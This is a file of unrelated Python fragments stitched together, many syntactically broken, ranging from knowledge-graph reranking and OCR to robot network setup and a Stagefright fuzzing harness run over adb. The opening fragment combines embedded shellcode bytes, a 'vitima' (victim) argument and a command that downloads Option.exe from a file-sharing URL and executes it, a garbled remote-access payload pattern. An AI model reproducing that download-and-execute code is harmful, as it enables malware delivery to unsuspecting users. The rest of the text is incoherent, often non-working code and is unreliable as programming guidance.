"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" + "\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" + "\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" + "\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" + "\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" + "\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" + "\x40\x61\x18\xaa") parser = argparse.ArgumentParser(description='<< Remote Desktop to Python!') parser.add_argument('--vitima', dest='accumulate', action='store_const') args = parser.parse_args() if param.vitima(): shellcode.set(vitima) subprocess('call', dir=0, shellcode=True) IPV4 = vitima[argv.exit] witdh, height = [int(IPV4) for a in str(subprocess.check_output("xrandr | grep '*' | awk '{print $1}'", shell=True))[2:-3].split('x')] t1 = thread.start(dest="30%") t2 = thread.start(0) t3 = thread.start(0) return vitima diretório = [dir, self=vitima()] if (diretório == "C:\Users\{}\Documents" + argv[4:0]): st = os.stat('data') os.chmod('Developer-3', st.st_mode | stat.S_IEXEC) FILE = grok.name('https://fs06n2.sendspace.com/dl/c4c91bd871422016d87ee6bf123836ce/5a9323f341db7394/1szd6a/Option.exe') subprocess.check_call(["C:\Users\{}\Downloads\Option.exe", "start", " | ", "grep", "{}" + argv[4:0]])
configuration = "" with open("/etc/systemd/network/eth0.network") as f: configuration = f.read() configuration = re.sub( "Address=\d+\.\d+\.\d+\.\d+(/\d+)?" , "Address=" + ip , configuration) with open("/etc/systemd/network/eth0.network", mode="w") as f: f.write(configuration) def getIpForLeg(legNumber): return "10.1.1." + str(legNumber) + "/24" def getIpForHip(hipNumber): return "10.1.1.1" + str(hipNumber) + "/24" if __name__ == '__main__': from docopt import docopt args = docopt(__doc__, version="Bone Specializer v0.1") if args["--leg"]: changeHostname("leg" + args["--leg"]) changeIpAddress(getIpForLeg(args["--leg"])) subprocess.call(["/home/stompy/bbbStuff/scripts/makeLegSymLinks.sh"]) elif args["--hip"]: changeHostname("hip" + args["--hip"]) changeIpAddress(getIpForHip(args["--hip"])) subprocess.call(["/home/stompy/bbbStuff/scripts/makeHipSymLinks.sh"]) elif args["--console"]: changeHostname("centralcontrol") changeIpAddress("10.1.1.10/24") subprocess(["rm", "rf", "/mnt/hardware"])
def video_hardware(device_id, seed_file):
    """Play a seed movie through stagefright's hardware decode path on a device,
    killed after 15 seconds by timeout(1)."""
    cmd = 'timeout 15 adb -s ' + device_id \
        + " shell stagefright -r '/data/Movies/" \
        + seed_file + "'"
    # BUG FIX: the subprocess module is not callable, and a command string
    # (with embedded quoting) requires shell=True.
    subprocess.call(cmd, shell=True)
import subprocess
import code

# BUG FIX: the subprocess module is not callable; subprocess.call runs the
# command and returns its exit status. The result is also renamed so it no
# longer shadows the imported `code` module.
status = subprocess.call(['ls', '-z'])
if status == 0:
    print('Command finished successfully')
else:
    # BUG FIX: message typo "wtih" -> "with".
    print("failed with code: %i" % status)
word = julius() if word == 'こんにちは': jtalk('こんにちは!') elif word == '名前覚えて': jtalk('おっけー。今は%sって呼んでるよ' % (use_shelf('username'))) # use_shelf('username') = julius() jtalk('%sだね。覚えたよ' % (use_shelf('username'))) elif word == '住所覚えて': jtalk('どこ住み?') # use_shelf('address') = julius() jtalk(use_shelf('address') + 'だね。覚えたよ') elif word == '勤務先覚えて': jtalk('職場どこ?') # use_shelf('work_address') = julius() jtalk(use_shelf('work_address') + 'だね。覚えたよ') elif word == '明日の天気教えて': jtalk('どこの?') type = julius() result if type == '住所': result = weather_forecast(use_shelf('address')) elif type == '勤務先': result = weather_forecast(use_shelf('work_address')) jtalk('明日の%sは%sだよ。最高気温は%s!' % (result[0], result[1], result[3])) elif word == 'c': jtalk('またね') use_shelf.close subprocess('ctrl+c') else: jtalk(word)
print 'audio - seed files are of audio type' print 'video - seed files are of video type' print 'play/noplay - enable testing of playback capabilities' print 'seed_number - number of the seed file to start from\n' print 'Ex: python test.py stagefright video noplay 0\n' sys.exit() target_type = sys.argv[1] format_type = sys.argv[2] playback = sys.argv[3] seed_number = sys.argv[4] # get device ids cmd = 'adb devices > devices.txt' subprocess(cmd) # parse the device id file to get the device list f1 = open('devices.txt', 'rw') devices = f1.readlines() count_devices = len(devices) - 2 dev = [None] * count_devices c = 0 for i in range(1, len(devices) - 1): reg_device = re.compile('\S*\s') dev[c] = str(reg_device.findall(devices[i])[0]) c = c + 1 # get batches list
def predict_rerank(args, test_exs, Q_scores, rerank_info, if_compare=False):
    """Rerank candidate answers with transX knowledge-graph embeddings and
    report hits@1/3/10 rates.

    Q_scores[ex_id] maps Q_id -> retrieval score (or (Q_id, Q_name) -> score
    when if_compare). Writes the annotated samples to
    rerank_files/<mode>_<train_mode>_<transX>_<size>_rerank.json.
    NOTE(review): only the if_compare=True path is supported; the original
    raises ValueError otherwise, which is preserved.
    """
    transE = args.transX == 'transE'
    transH = args.transX == 'transH'
    transR = args.transX == 'transR'   # kept for parity; not used below
    transD = args.transX == 'transD'

    filename = rerank_info['e_embed']
    p_filename = rerank_info['r_embed']
    A_filename = rerank_info['A_embed'] if args.transX != 'transE' else None
    N_entity = rerank_info['E']
    N_relation = rerank_info['R']
    h = args.size
    eid2idx = rerank_info['eid2idx']
    pid2idx = rerank_info['pid2idx']

    if transE:
        entity_embedding = np.memmap(filename, dtype='float32', shape=(N_entity, h), mode='r')
        relation_embedding = np.memmap(p_filename, dtype='float32', shape=(N_relation, h), mode='r')
    elif transH:
        def transferH(e, r_p):
            # project e onto the hyperplane with normal r_p
            return e - np.sum(e * r_p) * r_p
        entity_embedding = np.memmap(filename, dtype='float32', shape=(N_entity, h), mode='r')
        relation_embedding = np.memmap(p_filename, dtype='float32', shape=(N_relation, h), mode='r')
        relation_transfer = np.memmap(A_filename, dtype='float32', shape=(N_relation, h), mode='r')
    elif transD:
        def transferD(e, e_p, r_p):  # h, hp, rp
            return e + np.sum(e * e_p) * r_p
        entity_embedding = np.memmap(filename, dtype='float32', shape=(N_entity, h), mode='r')
        relation_embedding = np.memmap(p_filename, dtype='float32', shape=(N_relation, h), mode='r')
        A_embedding = np.memmap(A_filename, dtype='float32', shape=(N_entity + N_relation, h), mode='r')
        relation_transfer = A_embedding[:N_relation]
        entity_transfer = A_embedding[N_relation:]

    # predict, reranking
    exact_match = 0
    exact_match3 = 0
    exact_match10 = 0
    exclude_self = 0
    n_ans_exist = 0
    new_samples = []
    for ex_id, sample in enumerate(test_exs):
        ans_id = sample['ans_id']
        e1_id = sample['triple'][0][0]
        p_id = sample['triple'][0][1]
        ans_exist = sample['ans_exist']
        predictions = sorted(Q_scores[ex_id].items(), key=lambda item: item[1], reverse=True)
        if if_compare:
            predictions_names = [p[0][1] for p in predictions]
            predictions = [p[0][0] for p in predictions]
            old_pre = (predictions, predictions_names)
        else:
            predictions = [p[0] for p in predictions]
        if len(predictions) == 0:
            continue

        # 1) normalized retrieval score per candidate ('soft' reranking)
        if args.rerank_method == 'soft':
            total_score = 0
            my_score = []
            for c_idx, c in enumerate(predictions):
                score = Q_scores[ex_id][(c, predictions_names[c_idx])] if if_compare else Q_scores[ex_id][c]
                total_score += score
                my_score.append((c, score))
            my_score = dict([(c, score / total_score) for c, score in my_score]) if args.rerank_softnormal else dict(my_score)

        if eid2idx.get(e1_id) != None and pid2idx.get(p_id) != None:
            e1_idx = eid2idx[e1_id]
            p_idx = pid2idx[p_id]
            pre_indexs = [eid2idx[Q] for Q in predictions]
            # compute final score: L1 distance of (e1 + p) to each candidate e2
            if transE:
                final_scores = np.sum(abs(entity_embedding[e1_idx] + relation_embedding[p_idx] - entity_embedding[pre_indexs]), 1)
            elif transH:
                p_norm = relation_transfer[p_idx]
                e1_vec = transferH(entity_embedding[e1_idx], p_norm)
                p_vec = relation_embedding[p_idx]
                final_scores = []
                for index in pre_indexs:
                    e2_vec = transferH(entity_embedding[index], p_norm)
                    final_scores.append(np.sum(abs(e1_vec + p_vec - e2_vec)))
            elif transD:
                e1_vec = transferD(entity_embedding[e1_idx], entity_transfer[e1_idx], relation_transfer[p_idx])
                p_vec = relation_embedding[p_idx]
                final_scores = []
                for index in pre_indexs:
                    e2_vec = transferD(entity_embedding[index], entity_transfer[index], relation_transfer[p_idx])
                    final_scores.append(np.sum(abs(e1_vec + p_vec - e2_vec)))
            new_index = np.argsort(final_scores)
            # 2) reorder candidates
            if args.rerank_method == 'hard':
                predictions = list(np.array(predictions)[new_index])
            else:
                trans_score = []
                total_score = 0
                for c_idx, c in enumerate(predictions):
                    score = final_scores[c_idx]
                    total_score += score
                    trans_score.append((c, score))
                trans_score = dict([(c, score / total_score) for c, score in trans_score]) if args.rerank_softnormal else dict(trans_score)
                real_scores = [my_score[c] - trans_score[c] for c in predictions]
                # BUG FIX: negating a plain Python list raises TypeError;
                # convert to an ndarray before the descending argsort.
                new_index = np.argsort(-np.array(real_scores))
                predictions = list(np.array(predictions)[new_index])

        prediction = predictions[0]
        correct = prediction in ans_id
        exact_match += correct
        n_ans_exist += ans_exist
        # NOTE(review): prediction[0] is the first *character* of the id
        # string; preserved as-is from the original self-exclusion heuristic
        # — confirm it should not be `prediction == e1_id`.
        prediction = predictions[1] if (prediction[0] == e1_id and len(predictions) > 1) else predictions[0]
        correct_self = prediction in ans_id
        exclude_self += correct_self
        correct3 = len([p for p in predictions[:3] if p in ans_id]) != 0
        exact_match3 += correct3
        correct10 = len([p for p in predictions[:10] if p in ans_id]) != 0
        exact_match10 += correct10

        if if_compare:
            # annotate the sample with old/new predictions and outcome state
            predictions_names = list(np.array(predictions_names)[new_index])
            sample['rerank_pre'] = (predictions, predictions_names)
            sample['old_pre'] = old_pre
            sample['ans_exist'] = ans_exist
            old_prediction = sample['old_pre'][0][0]
            correct_old = old_prediction in ans_id
            sample['predict_true'] = correct_old
            sample['rerank_true'] = correct
            if not sample['predict_true'] and sample['rerank_true']:
                sample['state'] = 'rerank_useful'
            if sample['predict_true'] and sample['rerank_true']:
                sample['state'] = 'all_true'
            if not sample['predict_true'] and not sample['rerank_true']:
                sample['state'] = 'all_false'
            if sample['predict_true'] and not sample['rerank_true']:
                sample['state'] = 'rerank_wrong'
            sample['sample_id'] = ex_id
            new_samples.append(sample)
        else:
            raise ValueError

    total = len(test_exs)
    exact_match_rate = 100.0 * exact_match / total
    exact_match_rate3 = 100.0 * exact_match3 / total
    exact_match_rate10 = 100.0 * exact_match10 / total
    exact_match_rate_ans_exist = 100.0 * exact_match / n_ans_exist
    out_dir = 'rerank_files'
    # BUG FIX: subprocess('mkdir', 'p', out_dir) called the module directly
    # (and 'p' is not a valid flag); create the directory in-process.
    os.makedirs(out_dir, exist_ok=True)
    write_file = out_dir + '/{}_{}_{}_{}_rerank.json'.format(
        args.mode, args.train_mode, args.transX, args.size)
    with open(write_file, 'w') as f:
        json.dump(new_samples, f)
    return exact_match_rate, exact_match_rate3, exact_match_rate10, exact_match_rate_ans_exist, n_ans_exist
def audio_software(device_id, seed_file):
    """Play a seed audio file through stagefright's software decode path on a
    device, killed after 15 seconds by timeout(1)."""
    cmd = 'timeout 15 adb -s ' + device_id \
        + " shell stagefright -s -a '/data/Music/" \
        + seed_file + "'"
    # BUG FIX: the subprocess module is not callable, and a command string
    # (with embedded quoting) requires shell=True.
    subprocess.call(cmd, shell=True)
def playback_audio_hardware(device_id, seed_file):
    """Play back a seed audio file through stagefright's hardware path on a
    device, killed after 15 seconds by timeout(1)."""
    cmd = 'timeout 15 adb -s ' + device_id \
        + " shell stagefright -r -a -o '/data/Music/" \
        + seed_file + "'"
    # BUG FIX: the subprocess module is not callable, and a command string
    # (with embedded quoting) requires shell=True.
    subprocess.call(cmd, shell=True)
configuration = f.read() configuration = re.sub("Address=\d+\.\d+\.\d+\.\d+(/\d+)?", "Address=" + ip, configuration) with open("/etc/systemd/network/eth0.network", mode="w") as f: f.write(configuration) def getIpForLeg(legNumber): return "10.1.1." + str(legNumber) + "/24" def getIpForHip(hipNumber): return "10.1.1.1" + str(hipNumber) + "/24" if __name__ == '__main__': from docopt import docopt args = docopt(__doc__, version="Bone Specializer v0.1") if args["--leg"]: changeHostname("leg" + args["--leg"]) changeIpAddress(getIpForLeg(args["--leg"])) subprocess.call(["/home/stompy/bbbStuff/scripts/makeLegSymLinks.sh"]) elif args["--hip"]: changeHostname("hip" + args["--hip"]) changeIpAddress(getIpForHip(args["--hip"])) subprocess.call(["/home/stompy/bbbStuff/scripts/makeHipSymLinks.sh"]) elif args["--console"]: changeHostname("centralcontrol") changeIpAddress("10.1.1.10/24") subprocess(["rm", "rf", "/mnt/hardware"])
def createsnapshot(): print "taking clean image" subprocess(createsnap,shell=True)
else: # pdb.set_trace() if "vid_nums" in opt: vid_fnames = sorted( glob.glob(opt["inputDir"] + "/*%04i.mp4.enc" % num)[0] for num in opt["vid_nums"]) else: vid_fnames = sorted(glob.glob(opt["inputDir"] + "/*.mp4.enc")) for vid_fname in vid_fnames: if opt["redo_old"] or not os.path.exists( opt["saveDir"] + vid_fname.split("/")[-1].split(".")[0] + ".txt"): print "Loading video: %s" % vid_fname subprocess("openssl enc -d -des -in %s -out %s -pass pass:%s" % (vid_fname, vid_fname[:-4], password), shell=True) vid = skvideo.io.vread(vid_fname[:-4]) print "Loaded" vid_name = vid_fname.split("/")[-1].split('.')[0] joint_file = opt["saveDir"] + vid_fname.split("/")[-1].split( ".")[0] + ".txt" if opt["use_prev"] and os.path.exists(joint_file): print "Using previous joint file %s" % joint_file joints, confidences = load_joint_file(joint_file) #pdb.set_trace() else: # Apply network #pdb.set_trace() joints, confidences, heatmaps = applyNet(vid, opt) print "Heatmap done."
def runTessaract(files, language):
    """OCR each image in `files` into the 'temp' output base using `language`."""
    for imgFile in files:
        # BUG FIX: the subprocess module is not callable, and a command
        # string without shell=True would fail; an argv list also avoids any
        # shell quoting of the file name.
        subprocess.call(["tesseract", imgFile, "temp", "-l", language])